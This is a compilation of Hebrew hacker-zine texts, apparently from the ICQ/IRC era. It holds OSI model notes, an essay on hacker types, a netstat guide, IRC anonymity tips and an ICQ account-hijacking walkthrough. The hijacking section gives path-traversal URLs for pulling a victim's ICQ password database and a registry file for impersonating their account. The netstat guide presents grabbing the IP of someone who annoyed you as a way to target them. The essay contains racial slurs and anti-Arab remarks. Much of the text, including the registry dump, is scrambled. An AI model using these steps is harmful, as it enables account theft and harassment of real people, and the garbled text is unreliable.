.‫ ומשם זה ממשיך‬transport ‫ השכבה שולחת את הבקשה לשכבת‬,‫או כל דבר אחר‬
:‫כל שבעת השכבות מחולקות לעוד שלושה חלקים‬
communication subnet ‫ נקראות‬physical, data link, network-‫שכבות ה‬
host process ‫ נקראות‬session, presentation, application-‫השכבות ה‬
.‫ משמשת כחוצץ בין שני החלקים האחרים‬transport ‫ההשכבה האמצעית‬
osi model and internet
application , presentation , session

||
||
,nfs, xdr, rpc
,telnet, ftp
.smtp, rip
transport
||
||
tcp, udp
network , data link , physical

||
||
ip, icmp
802.2
csma/cd 802.3
token bus 802.4
token ring 802.5
osi model and novell netware
application , presentation , session

||
||
ncp, netbios
,emulation
,netx, btrieve
,netware, rpc
,streams, tli
sap
transport
||
||
spx, ipx
network , data link , physical

||
||
802.2
csma/cd 802.3
token bus 802.4
token ring 802.5
]by [twix
‫תרבות ההאקרים‬
‫הקדמה‬
‫בטקסט זה נספר קצת על התרבות של ההאקרים של ימינו‪ ,‬נגדיר את סוגם ונאפיין כל אחד ואחד‬
‫מהם‪.‬‬
‫הטקסט אמור להבהיר את עמדתם של ההאקרים בפריצה לאתר או לשרת שהם בוחרים ואת‬
‫הסיבות‪.‬‬
‫אתם בטח שואלים את עצמכם‪ ,‬מה לעזאזל אני רוצה מכם ולמה אני בכלל מוציא את החרבון הזה‬
‫לאור?‬
‫הסיבה פשוטה‪...‬כי אני פדופיל משועמם ואין לי מה לעשות בחיים חוץ מלמשש את כפתורי המחשב‪.‬‬
‫ועכשיו ברצינות‪ ,‬נתחיל!‬
‫רוב ההאקרים‪ ,‬אפילו בלי ידיעתם של רבים מהם‪ ,‬לא יודעים למה הם פורצים בשיטה אחת או אחרת‪,‬‬
‫ולמה הם עושים נזק בלתי הפיך או נזק מזערי‪...‬אבל אנחנו ננסה להגדיר אותם במקומם‪.‬‬
‫אני בטוח שלא פעם ולא פעמיים נפגשתם באתר שנפרץ‪ ,‬ורואים שכל לינק שאתם מנסים להתחבר‬
‫אליו דרך השרת‪ ,‬מת‪.‬‬
‫הסיבה לזה פשוטה‪ ,‬ההאקר שלנו‪ ,‬מחק לא רק את כל העקיבות של הרשומות שעוקבות אחריו ]‪[logs‬‬
‫אלא גם את כל תוכן האתר\השרת‪.‬‬
‫ולמה הוא עשה את זה? ‪-‬גם כאן הסיבה בדרך כלל אחידה‪ ,‬פריצה מסוג זה באה בדרך כלל מסיבות‬
‫גזעניות‪ ,‬מה שבתקופה האחרונה אנחנו נתקלים בו הרבה למדיי‪...‬אז הבנאדם מחליט שמאכסן השרת‬
‫הזה חייב למות ושייקלוט את המסר שהוא לא רצוי פה‪...‬‬
‫עוד סיבה לפריצה מסוג זה‪ ,‬באה בגלל שהבנאדם רוצה להשוויץ שהוא גורו ]מין אליל[ ושאף אחד לא‬
‫מסוגל עליו‪ ,‬בגלל שהוא מחק מהייקום איזה שרת ערבי מסכן‪ ,‬שלמנהל שלו אין במילא ממה‬
‫להתפרנס‪ ,‬אז הוא אפילו לא מאבטח אותו כמו שצריך‪...‬אז ממה כבר יש לו להתלהב? ‪-‬אז הוא הריץ‬
‫באג‪..‬אז הוא השתלט על השרת‪..‬מרגיש גבר אה?‬
‫אז שתדעו‪ ,‬שרוב ההאקרים הם לא כאלה‪ ,‬והם לא פועלים סתם בגלל דחפים לאומיים וכיוצא בהם‪.‬‬
‫אז מה בעצם המטרה של ה‪"-‬האקר הלוחם" שלנו בפריצה?‬
‫המטרה היא להעביר מסר או נקמה‪] ,‬בדרך כלל תוקעים איזה דגל ישראל ברקע[‪.‬‬
‫הפריצה באה במטרה להרוס את היריב ולא שום דבר מעבר לכך‪...‬או בגלל שהבנאדם רק חזר מאיזה‬
‫דיסקוטק ביום שישי ואמא כבר במיטה עם המאהב‪ ,‬אז אין מה לעשות ואין כוח לישון‪]...‬והסיבה‬
‫הזאת מוצדקת[‪.‬‬
‫עכשיו נגלה את הצד של ה‪"-‬האקר החיובי"‪:‬‬

‫ההאקר החיובי‪ ,‬הוא בעצם האקר\מאבטח‪ ,‬שהמטרה שלו בפריצה היא בדרך כלל להזהיר את מנהל‬
‫השרתים מאיזה באג באחת התוכנות\שרתים שמותקנים על השרת שלו‪.‬‬
‫כך מנהל השרת ייתקן את הבאג ושני הצדדים יהיו מבסוטים ואפילו לפעמים הפורץ ייקבל איזושהי‬
‫תמורה למעשה!‬
‫‪ -‬התנאי הוא‪ ,‬שהפורץ החכם שלנו‪ ,‬לא יימחק את דף המקור‪ ,‬אלא רק יישנה את שמו‪ ,‬ואת הדף אותו‬
‫הוא רוצה לעלות במקום‪ ,‬הוא יישנה לשם של דף האינדקס לדוגמא‪http://www.tuvia-the- :‬‬
‫‪kli.com/index.html‬‬
‫והאתר ייעלה תחת הקובץ שאותו שם הפורץ‪ ,‬שם הוא יכול לכתוב מה שבא לו‪...‬אבל הפורץ‬
‫המתורבת‪ ,‬ישים רק אזהרה למנהל השרת‪ ,‬ויציין את תיבת הדואר האלקטרוני שלו‪ ,‬ואת שם הקובץ‬
‫אותו הוא שינה‪.‬‬
‫אתם בטח שואלים את עצמכם‪":‬אבל מושיקו הוא כושון נחמד‪ ,‬למה לשרוף אותו?" ‪-‬נו טוב‪...‬זה מה‬
‫שאני הייתי שואל את עצמי‪ ,‬אבל נתעלם מזה‪.‬‬
‫השאלה שתצוץ בראש היא‪ ,‬מה ייצא לי מזה בכלל?!?!‬
‫התשובה פשוטה‪ :‬אתה תיחשב בתור האקר עם כבוד‪ ,‬ולא סתם אחד שאין לו חיים‪ ,‬אז הוא מוחק‬
‫אתרים‪...‬והרבה פעמים‪ ,‬מנהל השרת גם יימליץ עליכם לאחרים‪ ,‬וככה אולי אפילו תזכו להרבה‬
‫צ'ופרים ואולי אפילו עבודה!‬
‫בזמן האחרון‪ ,‬ההאקר החיובי תופס תאוצה ברשת‪ ,‬כי רוב ההאקרים מבינים שאם הם ימשיכו בדרך‬
‫השלילית‪...‬זה יוביל אותם לקינוס המחשב שלהם‪ ,‬ואולי אפילו לתיקים פליליים‪...‬אז בשביל מה כל‬
‫הבלאגן?‬
‫חשוב לזכור‪:‬‬
‫לא תמיד מנהל השרת יחשיב את הפריצה שלכם כמשהו חיובי‪ ,‬ובכל רגע הוא יכול להסתכל על‬
‫הלוגים שלנו ]רשומות[ אלא אם לא מחקתם אותם‪ ,‬ופשוט לדווח עליכם למשטרה או לספק‬
‫האינטרנט שלכם ‪-‬שבשמחה יירצה לקחת ממכם את חשבון האינטרנט שלכם אפילו אם הוא מרוויח‬
‫מזה‪...‬‬
‫מסקנה‪:‬‬
‫אם אתם בוחרים ללכת על האקינג‪ ,‬תחשבו טוב טוב איזה סוג של "פרצנים" אתם רוצים‬
‫להיות‪...‬תחשבו אם בכלל כדאי לכם להיכנס לעסק המלוכלך‪ ,‬ואם כן‪ ,‬אז שתדעו טוב יותר את‬
‫הדברים שלפניכם‪...‬‬
‫מידע על ‪ ip‬וערוצים(‪ )ports‬על‪-‬ידיי פקודת ‪netstat‬‬
‫מבוא‬
‫א‪ .‬שימוש ב‪netstat-‬‬
‫ב‪ .‬פענוח ערוצים פתוחים‬
‫ג‪ .‬שימוש ב‪ netstat-‬לגילוי מספרי ‪ ip‬של משתמשי תוכנת ‪icq‬‬
‫ד‪ .‬שימושים נוספים‬
‫ה‪ .‬כלים ועזרים‬
‫ו‪ .‬טיפים שימושיים‬
‫ז‪ .‬סיכום‬
‫מבוא‬
‫אתם קוראים מדריך של ארגון ההאקרים הישראלי‪ ,‬אנא התעלמו משגיאות כתיב‪.‬‬
‫אני מקווה שתרכשו יידע מעמיק יותר מקריאת טקסט זה‪ ,‬והעיקר הוא שתהנו מקריאתכם!‬
‫אני מציע שתדפיסו את הטקסט בכדיי שיהיה לכם נוח יותר לקרוא אותו‪.‬‬
‫קריאה מהנה‪.cntax ,‬‬
‫א‪ .‬שימוש ב‪netstat-‬‬

‫‪-‬הפעלת התוכנה‪:‬‬
‫לחצו על ]‪([start‬התחל בגירסא העברית) ]‪([programs‬תוכנות או עזרים) ]‪.[ms-dos prompt‬‬
‫‪ netstat‬היא תוכנה מאוד שימושית שמתאימה להרבה משימות‪ .‬אני אישית משתמש בתוכנה בכדיי‬
‫להשיג מספרי ‪ ip‬של אנשים שאני מדבר איתם ב‪ .icq-‬כמו כן אפשר להשתמש ב‪ netstat-‬על מנת לאתר‬
‫פריצות של סוסים טרויאנים(‪ )trojans‬במחשבכם או סתם בכדיי לראות את תנועת הערוצים‪.‬‬
‫הסתכלו על הדוגמא שלפניכם של הפלט שנותנת התוכנה בעת הקשת‪ netstat :‬בשורה‪c:\windows :‬‬
‫בחלון ‪.ms-dos prompt‬‬
‫‪c:\windows>netstat‬‬
‫‪active connections‬‬
‫‪proto local address‬‬ ‫‪foreign address‬‬ ‫‪state‬‬
‫‪tcp pavilion:25872‬‬ ‫‪warlock:1045‬‬ ‫‪established‬‬
‫‪tcp pavilion:25872‬‬ ‫‪sy-as-09-112.free.net.au:3925 established‬‬
‫‪tcp pavilion:31580‬‬ ‫‪warlock:1046‬‬ ‫‪established‬‬
‫‪tcp pavilion:2980‬‬ ‫‪205.188.2.9:5190‬‬ ‫‪established‬‬
‫‪tcp‬‬ ‫‪pavilion:3039‬‬ ‫‪24.66.10.101.on.wave.home.com:1031 established‬‬
‫עכשיו בואו נסתכל על הדוגמא‪ .‬אתם רואים ]‪ [proto‬בצדו השמאלי של המסך‪.‬‬

‫אחריו תראו ]‪ [foreign address‬שורה זו תתן לנו את מספר ה‪ ip-‬או‪/‬ו שם השרת של המשתמש ואת‬
‫הערוץ(‪ )port‬עליו הוא נמצא בצורה הבאה‪ ip:port :‬עם "‪ ":‬בין מספר ה‪ ip-‬לערוץ‪.‬‬
‫ובסוף תמצאו את המילה ]‪([state‬מצב) מה שפשוט מראה את מצב הערוץ(‪.)port‬‬
‫חלק זה יכול להיות במצב‪ established-‬במצב מחובר או‪ waiting connect-‬אם אם הוא במצב‬
‫האזנה(למידע)‪.‬‬
‫עכשיו עם יידע זה אנחנו עוברים לשלב מתקדם יותר על איך להשתמש בתוכנה בכדיי לפענח ערוצים‬
‫פתוחים‪.‬‬
‫ב‪ .‬פענוח ערוצים פתוחים‬
‫קרה לכם שמשהו מוזר קורה למחשב שלכם? הסי‪.‬די‪-‬רום נפתח בעצמו? המסך נכבה בלי שכיביתם‬
‫אותו? ואתם שואלים את עצמכם מה לעזאזל קורה פה?‪...‬ולפתע מבינים שמישהו פורץ לכם למחשב‬
‫בעזרת טרויאן(‪.)trojan‬‬
‫אז עכשיו המשימה שלכם היא לבדוק איזה טרויאן שלחו לכם ולהשמיד אותו נכון? ובכן אתם‬
‫צודקים‪.‬‬
‫אז לכו שוב ל‪ .ms-dos prompt-‬עכשיו יש לנו הרבה אפשרויות שאפשר להשתמש בהם דרך ‪netstat‬‬
‫אז אתם יכולים לכתוב כך על מנת לקבל את תפריט העזרה של ‪:netstat‬‬
‫‪c:\windows>netstat help‬‬
‫(אולי אני אכתוב תוסף שיופיע בו התפריט במצב מתורגם)‬
‫תעיינו בתפריט ותחזרו לכאן‪...‬‬
‫קראתם?‪...‬אז בואו נמשיך‪...‬‬
‫אני אישית אוהב את הפקודה (‪ )c:\windows\netstat -an‬שמראה את כל הערוצים(‪ )ports‬הפתוחים‬
‫ואת כל החיבורים בצירוף כתובת ה‪ ip-‬במקום שם השרת(‪.)hostname‬‬
‫עכשיו כשאתם יודעים לבדוק את החיבורים‪ ,‬אתם יכולים לחפש ערוצים של טרויאנים כמו ‪(12345‬‬
‫‪ netbus‬הישן) כמו ‪ )sub seven(1243‬וכו'‪.‬‬
‫עכשיו כל מה שלמדתם יהיה מאוד שימושי לכל הצרכים שלכם שמייד תגלו‪ ,‬אבל קודם לכו תעשו‬
‫הפסקה קטנה כדיי שכל המידע שקיבלתם עד עכשיו ייספג לכם טוב טוב למוח ותחזרו לפה מוכנים‬
‫ללמוד עוד!‬
‫ג‪ .‬שימוש ב‪ netstat-‬לגילוי מספרי ‪ ip‬של משתמשי תוכנת ‪icq‬‬
‫האם אי‪-‬פעם רציתם להשיג את ה‪ ip-‬של מישהו שעיצבן אותכם ב‪ icq-‬אבל הוא היה מוסתר או‬
‫שפשוט לא הופיע? אני מתאר לעצמי שכן‪...‬אז בואו נלמד שיטה שתעזור לנו למצוא ‪ ip‬של אנשים‬
‫שמחוברים ל‪ icq-‬שלנו‪.‬‬
‫גילוי מספר ‪ ip‬של משתמש ‪ icq‬דרך ‪- netstat‬‬
‫בכדיי להשיג מספר ‪ ip‬של המשתמש‪ ,‬עליכם לפתוח את ה‪ ms-dos prompt-‬ולעשות ‪netstat -n‬‬
‫(בכדיי לראות את כל רשימת הפורטים הפתוחים) לפני שהתחלתם לדבר איתו ב‪ ,icq-‬רשמו את‬
‫המספרים על דף או מסמך‪.‬‬
‫עכשיו הגיע הזמן לגלות את מספר ה‪ ip-‬שלו‪ .‬שלחו למשתמש הודעה עכשיו עשו במהירות ‪netstat -n‬‬
‫ותתווסף לכם שורה חדשה של מספר ‪ ,ip‬עכשיו גלו בעזרת הרשימה שעשיתם את המספר החדש‪,‬‬
‫עכשיו יש לכם את המספר של המשתש בלי להשתמש בכל מיני פריצות ופאצ'ים(שלא תמיד עובדים)‬
‫עכשיו אחרי לכדתם את המספר שלו אתם יכולים לעשות איתו מה שבא לכם! כיף לא?‬
‫ד‪ .‬שימושים נוספים‬
‫ב‪ netstat-‬אפשר להשתמש להשגת ‪ ip‬של כל דבר וכל אחד‪ ,‬כל עוד יש חיבור ישיר בין שני‬
‫הכיוונים(בינך לבין התוכנה או בין המשתמש השני) לדוגמא‪:‬העברת קבצים‪ ,‬הודעות ישירות‪ ,‬צ'אט‬
‫של ‪ ,icq‬במירק(‪ )mirc‬ועוד‪...‬‬
‫ד‪ .‬כלים ועזרים‬

‫סריקת ערוצים‪ :‬בכדיי לבדוק ערוצים(‪ )ports‬פתוחים במחשב(לא שלכם ‪)):‬‬
‫]‪ - [seventh sphere port scanner‬שני אתרים למקרה שאחד האתרים נפל‬
‫‪http://members.xoom.com/cryptog/7spereportscan.exe‬‬
‫‪http://members.xoom.com/gohan_3/7spereportscan.exe‬‬
‫]‪ - [lockdown 2000‬תוכנה למניעת פריצות למחשב האישי‬
‫‪http://www.lockdown.com‬‬
‫]‪ - [icq‬למי שעדיין אין לו(למרות שלא נראה לי שיש מישהו כזה‪)..‬‬
‫‪http://web.icq.com‬‬
‫ה‪ .‬טיפים שימושיים‬
‫א‪ .‬לפעמים ‪ netstat‬פולט רשימות ארוכות מאוד מה שעלול להקשות ולבלבל משתמש מתחיל‪ .‬אם‬
‫אתם מתקשים‪ ,‬פשוט תריצו את ‪ netstat‬ללא שום פקודות ותיצרו קשר עם המשתמש השני(על ידיי‬
‫שליחת‪/‬קבלת הודעה מהמשתמש השני) ואז תריצו את ‪ netstat‬שנית‪ .‬צריכה להופיע שורה חדשה ‪ -‬זה‬
‫מה שאתם מחפשים!‬
‫ב‪ .‬יבוא בגירסא הבאה‪...‬‬
‫ו‪ .‬לסיכום‬
‫אני מאוד מקווה שהמדריך העניק לכם יידע ושמעכשיו תתחילו להתנסות בדרכים מקצועיות יותר‬
‫כמו זו‪.‬‬
‫אני מבטיח שעוד הרבה מאוד מדריכים יגיעו בהמשך ויילוו אתכם לאורך כל הדרך‪ ,‬עד שתהייו‬
‫איינשטיינים קטנים! טוב‪...‬אולי הגזמתי ‪ ):‬אז בקיצור תכנסו לאתר שלנו בכדיי להתעדכן בעולם‬
‫ההאקרים וכל העולם התחתון!‬
‫‪by tricker‬‬
‫תורגם ע"י ‪cntax‬‬
‫אנונימיות ב‪irc -‬‬
‫שלום לכולם במדריך זה אני יראה לכם כמה שיטות איך להיות אנונימי ב‪ irc-‬כתבתי את המדריך‬
‫הזה מכיוון‬
‫שכל הזמן שואלים אותי איך להסתיר את האי פי שלי אז תקראו ותבינו אז יאללה נתחיל‬
‫שיטה ‪:1-‬‬
‫במירק ישנה אפשרות לשרתים שתומכים בזה להסתרת האיי פי וזה הולך ככה‬
‫'‪( '/mode yournick +x‬בלי הגרשים)‬
‫זה אומר לשרת ‪ irc‬אם הוא תומך בזה להסתיר את האיי פי אם מישהו עושה עליך ‪whois‬‬
‫שיטה‪ 2-‬דרך ‪ wingate‬הדרך הקלה‬
‫כל מה שאתה צריך לעשות בשיטה הזאת זה ללכת ל‪:‬‬

‫‪file --> option --> firewall‬‬
‫ולסמן את האפשרות‬
‫‪use socks firewall‬‬
‫ולהכניס שרת ‪ wingete‬בפורט ‪1080‬‬
‫שיטה‪ 3-‬דרך ‪ wingate‬הדרך הקשה‬
‫תכנס את הפקודה הבא כאשר את במצב ‪offline‬‬

‫‪/server wingate-ip:[port 23] ie /server xxx.xxx.xxx)ip address( 23‬‬
‫עכשיו אתה מחובר ל ‪wingate‬‬
‫עכשיו להתחבר לשרת מירק שאתה רוצה תכניס את השורה הבא‬
‫‪/quote irc.server.com 6667‬‬
‫את הצעד הבא תצטרך לבצע מהר לפני שתקבל פינג תכניס את השורות הבאות‬
‫‪/quote user god bikkel snikkel urnick‬‬
‫‪/quote nick urnick‬‬
‫אם יש לכם תגובות או בקשות שלחו לי איי מיל‬

‫‪elidor86@hotmail.co.il‬‬
‫‪by vb-man‬‬
‫קיו‬.‫סי‬.‫פריצה לאי‬
.)‫קובץ הסבר על להשיג סיסמאות של משתמשים אחרים & להתלבש על המספר שלהם(בלי הסיסמא‬
.)‫הרבה אנשים רצו לדעת איך לעשות את זה וזה ממש קל (למי שחשב שזה קשה‬
.‫ אז עם לא עובד לכם אל תבואו בטענות‬,‫ זה לא תמיד עובד‬- ‫אבל יש בעיה קטנה קטנה‬
:‫ תוודאו שאתם יודעים את הדברים הבאים‬- ‫קודם‬
.‫ והוא לא נגע בהגדרות שהאיסיקיו שם לא לאחר ההתקנה‬99 ‫& שהוא הוריד את גירסא‬
.‫ לא אני כתבתי את האיסיקיו אז מצטער‬,‫אני יודע שזה קצת מעיק אבל אין מה לעשות‬
.‫זה טוב לעבוד על ליימרים או אנשים שאתם יודעים מה קורה אצלהם במחשב‬
.‫& איפי של המשתמש שאתם רוצים לגלות את סיסמתו‬
.‫& מספר האי סי קיו של המשתמש שאתם רוצים לגלות את סיסמתו‬
‫ הורידו את הקבצים הבאים‬.1
http://123.123.123.123/.html/....../db/uin.idx
http://123.123.123.123/.html/....../db/uin.dat
http://123.123.123.123/.html/....../db/uinmsg.dat
http://123.123.123.123/.html/....../db/uinmsg.idx
http://123.123.123.123/.html/....../db/uinhis.idx
http://123.123.123.123/.html/....../db/uinhis.dat
.‫ שימו את המספר שלו‬uin - ‫ החליפו במספר האיפי של הקורבן ובמקוםה‬123.123.123.123 - ‫*את ה‬
‫ לא שמונה(הם השורות לגישה של התיקיה של האיסיוקיו של‬,‫**יש שש נקודות באמצע השורה‬
.)‫הקורבן‬
.‫כאן יש להשתמש באקספוילט אחר אשר לא בגכל הפעמים זקוקים לו‬
:‫פתחו קובץ טקסט חדש והעתיקו את השורות הבאות לשם‬.2
.‫ למספר של הקורבן שלכם‬hackeduin ‫ להחליף את המילה‬: ‫*** לזכור‬
"hkey_current_user\software\mirabilis\icq\owners\hackeduin]"name"="hacked uin]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs]
random groups version"=dword:0000000a"online color"=dword:00ff0000"
unlisted color"=dword:00800000"offline color"=dword:000000ff"
authorize color"=dword:00400080"notify color"=dword:00800080"
laststatus color"=dword:00008000"
""="default file dir"="c:\\program files\\icq\\received files""smtp address"
""="dnd message"="please do not disturb me now. disturb me later.""out message"
".busy message"="user is occupied. only urgent messages will be delivered"
chat message"="i would like to chat about anything""away prenum"=dword:00000000"
out prenum"=dword:00000000"busy prenum"=dword:00000000"
dnd prenum"=dword:00000000"chat prenum"=dword:00000000"
file options"=dword:00000004"url options"=dword:00000004"
chat options"=dword:00000004"all options"=dword:0000000e"
"ext options"=dword:00000004"startup"="no""auto away"="no"
"auto hide time"=dword:0000001e"auto hide"="no""move server top"="no"
"blink in tray"="no""sort lists"="yes""show online list"="no"
"remove addfriend"="yes""splash open"="yes""history last first"="yes"
"floattop"="yes""thru server"="no""join chat"="no""open url browser"="no"
"refuse file notinlist"="no""overwrite existfile"="no"
"disable online alert"="yes""accept urgent in busy"="no"
"blink tray in awaybusy"="yes""use contact list color"="no"
"contact list color"=dword:00c8b99d"save user file"="yes""auto update"="yes"
"search wizard"="no""default mailer"="yes""pop play sound"="yes"
pop auto launch"="no""pop check"="no""pop time"=dword:0000000a"
"check headers"="yes""movetooutdelay"=dword:00000014"movetoout"="no"
"movetoawaydelay"=dword:0000000a"movetoaway"="no""auto sleep mode"="no"
"log history events"="yes""connection type"="permanent""firewall"="yes"
usegivenip"="no""socks"="no""socksport"=dword:00000438"
"socksserver"="enter your socks server"
proxysocks4host"="enter your proxy server""proxysocks4port"=dword:00000438"
useproxysocks4"="no""givestats"="no""socksversion"=dword:00000004"
socksauthentication"=dword:00000000"firewalltimeout"=dword:0000001e"
"usefirewalltimeout"="no""usefirewallrangeports"="yes"
firewallfromport"=dword:000059d8"firewalltoport"=dword:00007148"
";"="old sockets"="no""usertype"=dword:00000000"mail receipients"
random available"="no""randomgroupname"=dword:00000001"
"random name"="#¥d¶³ 666 £[""allow secure clients only"="yes"
phoneapproval"="yes""phonetonetime"=dword:00000032"
phonepausetime"=dword:000001f4"phonebreaktime"=dword:00000028"
" "="phonesettings"=dword:00000001"phonepausechar"=",""phonelocalp"
"phonelongp"=" ""phoneinterp"=" ""chat roomname"="product support / suggestion"
auto join chat room"="yes""novice counter"=dword:0000000a"
menu counter"=dword:00000013"servers version"=dword:00000001"
externals version"=dword:00000019"
\,stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
\,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"novice"="no"00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
dropped users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00"
state flags"=dword:00000000"server msg version"=dword:0000000b"
server msg shown"=dword:00000001"server msg count"=dword:00000009"
"leftbutton warning"="no""menu left click"="no""tip startup"="no"
"tip position"=dword:00000000"moreevents warning"="no""invisible warning"="no"
"send later warning off"="no""busy warning"="no""away warning"="no"
"dnd warning"="no""ft warning"="no""ext warning"="no""out warning"="no"
"chat warning"="no"
"away message"="user is currently away\r\nyou can leave him/her a message"
random comment"="you won't be hurt by things you don't care.\r\n\r\n(c) calvin's labs, 1993-1998. no"
".rights reserved.\r\nit's not a secret. it's not a magic. it's not a myth
[hkey_current_user\software\mirabilis\icq\owners\youruin\prefs\presets]
"!outmsg presets 0"="i'm out'a here. see you tomorrow"
".dndmsg presets 0"="please do not disturb me now. disturb me later"
"away presetsmsg 0"="away""out presetsmsg 0"="out for the day"
"busy presetsmsg 0"="busy""dnd presetsmsg 0"="dnd""chat presetsmsg 0"="chat"
".awaymsg presets 1"="i am out to lunch. i will return shortly"
""="outmsg presets 1"
".dndmsg presets 1"="i am currently in a meeting. i can't be disturbed"
"chatmsg presets 1"="come join my chat room!""away presetsmsg 1"="lunch"
"out presetsmsg 1"="not here""busy presetsmsg 1"="meeting"
"dnd presetsmsg 1"="meeting""chat presetsmsg 1"="come in"
"!awaymsg presets 2"="don't go anywhere! i'll be back in a jiffy"
".outmsg presets 2"="i'm closed for the weekend/holidays"
"!dndmsg presets 2"="don't disturb my concentration"
"!chatmsg presets 2"="don't miss out on the fun! join our chat"
"away presetsmsg 2"="be right back""out presetsmsg 2"="closed"
"busy presetsmsg 2"="concentration""dnd presetsmsg 2"="concentration"
"chat presetsmsg 2"="fun"
".awaymsg presets 3"="i'm out with the dog. be back when he's finished"
".'outmsg presets 3"="gone fishin"
"!dndmsg presets 3"="i'm on the phone with a very important client. don't disturb me"
"!chatmsg presets 3"="what are you waiting for? come on in"
"away presetsmsg 3"="dog walk""out presetsmsg 3"="fishing"
"busy presetsmsg 3"="on the phone""dnd presetsmsg 3"="on the phone"
" .chat presetsmsg 3"="don't wait""awaymsg presets 4"="went out for a smoke"
".outmsg presets 4"="i'm sleeping. don't wake me"
".dndmsg presets 4"="i can't chat with you now. i'm busy"
".chatmsg presets 4"="we'd love to hear what you have to say. join our chat"
"away presetsmsg 4"="smoke""out presetsmsg 4"="sleeping"
" busy presetsmsg 4"="can't chat ""dnd presetsmsg 4"="can't chat"
".chat presetsmsg 4"="hear""awaymsg presets 5"="on my coffee break"
".outmsg presets 5"="went home. had to feed the kids"
"?dndmsg presets 5"="can't you see i'm working"
"chatmsg presets 5"="enter your chat room message here"
"away presetsmsg 5"="coffee""out presetsmsg 5"="kids"
"busy presetsmsg 5"="working""dnd presetsmsg 5"="working"
".chat presetsmsg 5"="empty""awaymsg presets 6"="went to get some fresh air"
".outmsg presets 6"="gone for good"
"dndmsg presets 6"="enter your occupied message here"
"chatmsg presets 6"="enter your chat room message here""away presetsmsg 6"="air"
"out presetsmsg 6"="gone""busy presetsmsg 6"="conversing"
"dnd presetsmsg 6"="empty""chat presetsmsg 6"="empty"
".busymsg presets 7"="user is occupied. only urgent messages will be delivered"
"dndmsg presets 7"="enter your occupied message here"
"chatmsg presets 7"="enter your chat room message here"
"away presetsmsg 7"="empty""out presetsmsg 7"="empty""busy presetsmsg 7"="empty"
"dnd presetsmsg 7"="empty""chat presetsmsg 7"="empty"
"busymsg presets 0"="user is currently occupied"
"chatmsg presets 0"="i would like to chat about anything"
"busymsg presets 1"="user is currently occupied1"
"busymsg presets 2"="user is currently occupied2"
"awaymsg presets 7"="user is currently away"
"outmsg presets 7"="user is currently n/a"
"awaymsg presets 0"="user is currently away\r\nyou can leave him/her a message"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\motd\message0]
".message"="please bookmark our network status page"
""="urlname"="http://www.mirabilis.com/status.html""url"="press here""date"
"urlname"="http://www.mirabilis.com/emailsig.html"
""="url"="go to the icq e-mail signature generator""date"
message"="icq is doing it again! one more new service from icq for your pleasure! create your icq interest"
") !group - home, work, family, hobby, affiliation, sports, music...etc..( it's straight forward, no html needed
"urlname"="http://www.icq.com/announcements/02.html"
"url"="it's fun and easy, go!!""date"="31-mar-98"
"!urlname"="http://www.icq.com/announcements/whitepages.html""url"="go"
"date"="1-apr-98"
message"="icq can notify you when you receive an e-mail and show you the e-mail headers! learn how to"
"!do it
"urlname"="http://www.mirabilis.com/email.html"
"url"="e-mail notification instructions""date"="15-jun-98"
"urlname"="http://www.icq.com/announcements/05.html""url"="create your greeting"
"date"="12-jul-98"
"url"="click for more information""date"="26-aug-98"
"!message"="icq can alert you when you receive emails and show you the email headers"
"urlname"="http://www.icq.com/announcements/07.html""url"="learn how to do it"
"date"="06-sept-98"
"url"="click for more information""date"="20-oct-98"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\randomgroups\randomgroup1]
name"="general chat""number"=dword:00000001"version"=dword:00000001"
name"="romance""number"=dword:00000002"version"=dword:00000002"
name"="games""number"=dword:00000003"version"=dword:00000003"
name"="students""number"=dword:00000004"version"=dword:00000004"
name"="20 something""number"=dword:00000006"version"=dword:00000006"
name"="50 plus""number"=dword:00000009"version"=dword:00000009"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\servers]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\servers\server1]
host"="icq1.mirabilis.com""port"=dword:00000fa0"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals]
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\canasta]
":type"="command""command line"="/ip "
"path"="c:\\program files\\canasta\\canasta.exe"
url"="http://ourworld.compuserve.com/homepages/mharte""version"=dword:0000000f"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\connectix videophone]
"type"="extension""format"="/p:tcp /ac:""extension"="cvp"
url"="http://www.connectix.com/html/videophone.html""version"=dword:00000009"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\cu-seeme]
"type"="command""command line"="""path"="c:\\cuseeme\\cuseem32.exe"
url"="http://www.cu-seeme.com/""version"=dword:00000006"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\iris phone]
"/type"="extension""format"="""extension"="iru""url"="http://irisphone.com"
version"=dword:0000000a"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat]
"type"="serverextension""format"="1.1\\n-u 1 -a ""extension"="vce"
"numparameters"=dword:00000002"server1"="vchat1.microsoft.com"
url"="http://vchat1.microsoft.com""version"=dword:00000011"
[hkey_current_user\software\mirabilis\icq\owners\hackeduin\prefs\externals\microsoft vchat\param1]
"paramname"="world""canotherchange"="no""param1"="#compass""param2"="#bugworld"
"param3"="#fishbowl""param4"="#lodge""param5"="#lunar""param6"="#lodge"
